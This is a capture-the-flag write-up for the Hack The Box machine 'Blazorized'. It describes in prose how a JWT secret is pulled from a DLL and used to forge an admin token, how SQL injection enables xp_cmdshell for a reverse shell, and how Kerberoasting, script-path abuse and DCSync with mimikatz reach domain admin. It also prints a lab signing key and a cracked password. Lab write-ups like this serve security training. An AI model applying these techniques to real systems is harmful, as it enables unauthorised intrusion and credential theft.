Personal WebsiteLinkedin

Blazorized

https://www.hackthebox.com/achievement/machine/107027/614

Enumeration

Trying to enumerate using default timing for scanning result in long timeout errors:

To move forward, i've start nmap with -T4 option:

Port 80

There is a section called "Check for Updates" that seems to be very interesting because interact with some API as administrator user:

Also there is a "Markdown Playground":

The section "Interesting Digital Gardens" and "Misc.Links" show us an API interaction error:

Trying to fuzz subdomain using gobuster we will obtain an interesting result:

admin.blazorized.htb requires credentials to login:

The backend makes some query to internal API about categories when we hit the Check for Updates button:

It's a Blazor WASM webapp, so analyzing the _framework/blazor.boot.json we can find metadata about application such as DLLs used:

These seem from the name to be the most interesting ones:ut

In particular the last one:

If we copy the HTTP request of Blazorized.Helpers.dll and paste in another tab, we will start the DLL download and we can disassembly it using ildasm.exe on a Windows machine with Visual Studio installed:

Revealing some hardcoded secrets in Blazorized.Helpers.dll:

Extracted informations are these one:

  • jwtSymmetricSecurityKey:️8697800004ee25fc33436978ab6e2ed6ee1a97da699a53a53d96cc4d08519e185d14727ca18728bf1efcde454eea6f65b8d466a4fb6550d5c795d9d9176ea6cf021ef9fa21ffc25ac40ed80f4a4473fc1ed10e69eaf957cfc4c67057e547fadfca95697242a2ffb21461e7f554caa4ab7db07d2d897e7dfbe2c0abbaf27f215c0ac51742c7fd58c3cbb89e55ebb4d96c8ab4234f2328e43e095c0f55f79704c49f07d5890236fe6b4fb50dcd770e0936a183d36e4d544dd4e9a40f5ccf6d471bc7f2e53376893ee7c699f48ef392b382839a845394b6b93a5179d33db24a2963f4ab0722c9bb15d361a34350a002de648f13ad8620750495bff687aa6e2f298429d6c12371be19b0daa77d40214cd6598f595712a952c20eddaae76a28d89fb15fa7c677d336e44e9642634f32a0127a5bee80838f435f163ee9b61a67e9fb2f178a0c7c96f160687e7626497115777b80b7b8133cef9a661892c1682ea2f67dd8f8993c87c8c9c32e093d2ade80464097e6e2d8cf1ff32bdbcd3dfd24ec4134fef2c544c75d5830285f55a34a525c7fad4b4fe8d2f11af289a1003a7034070c487a18602421988b74cc40eed4ee3d4c1bb747ae922c0b49fa770ff510726a4ea3ed5f8bf0b8f5e1684fb1bccb6494ea6cc2d73267f6517d2090af74ceded8c1cd32f3617f0da00bf1959d248e48912b26c3f574a1912ef1fcc2e77a28b53d0a

  • superAdminEmailClaimValue: [email protected]

  • postsPermissionsClaimValue: Posts_Get_All

  • categoriesPermissionsClaimValue: Categories_Get_All

  • superAdminRoleClaimValue: Super_Admin

  • issuer: http://api.blazorized.htb

  • apiAudience: http://api.blazorized.htb

  • adminDashboardAudience: http://admin.blazorized.htb

Now forge using these information a JWT for Super Admin on Jwt Builder:

But we still lack to know which signing algorithm is used by the backend:

We can easily identify it by deassembling the JWT class and looking at its code where valid algorithms are listed:

Note how in this screenshot to make it easier to read the code the dnSpy tool was used.

Now finally set up the JWT under Local storage as shown in the picture and refresh to access successfully the admin dashboard:

On the home page of the admin control panel we find an interesting clue regarding the operation and communication of the application with the backend. From the scan performed earlier we know that there is an MSSQL Server 2022:

Port 1433

This functionality probably set the MSSQL raw query in this way:

To inject some SQL code we need to truncate the query and insert the code to enable xp_cmdshell:

And run the encoded powershell command to obtain a reverse shell:

we will obtain a reverse shell as NU_1055 and we can get the user flag 🎉

Download on victim machine SharpHound because we don't have any credentials to run remotely the AD collection tools like BloodHound or SharpHound:

I've used the v1.1.0 of SharpHound due to incompatibility errors during uploading JSON in BloodHound https://github.com/BloodHoundAD/BloodHound/issues/702

Now to grab on Kali machine this ZIP file we can use SMB to upload it from reverse shell to a SMB share started using impacket.

On Kali machine start a SMB server creating a share called SHARE inside a directory:

From Windows create username, password and then credential variable. Define also the source path to file to exfiltrate:

Map remote SMB share to a local drive:

Finally copy the zip to SMB share:

Now unzip and import these JSONs in BloodHound:

Mark user NU_1055 as Owned and find some juicy privesc path:

From BloodHound we can see that RSA_4810, a user seen previously also under C:\Users directory, can be a Kerberoastable user:

If we analyze the correlation between two users, setting NU_1055 as starting point and RSA_4810 as ending node, we will find that NU_1055 has WriteSPN on RSA_4810:

To exploit this we use SPN-jacking attack and we need to upload PowerView.ps1.

Set SPN and request a service ticket:

we got the TGS ticket, save it in a file and use John The Ripper to brute force it:

Username: RSA_4810

Password: (Ni7856Do9854Ki05Ng0005 #)

Finally we can use evil-winrm to login as RSA_4810 user:

Privilege Escalation (SSA_6010)

Restart the enumeration phase using on victim machine SharpHound and exfiltrate using SMB server the ZIP containing all the JSON files. Using BloodHound we didn't find any interesting infos. Try to use PowerView:

we can see that RSA_4810 can change script-path of SSA_6010 so as RSA_4810 we can add a reverse shell script to a writable directory and set it as a script path for the user SSA_6010:

Set the ScriptPath for SSA_6010:

Get the reverse shell:

We know from previous analysis with BloodHound that SSA_6010 have DCSync privilege on Domain Controller:

Privilege Escalation (Administrator)

Download Mimikatz on machine and grab the Administrator hash:

Run the DCSync attack using mimikatz:

Login using evil-winrm and finally pwn the machine 🎉

PreviousEditorialNextPermX

Last updated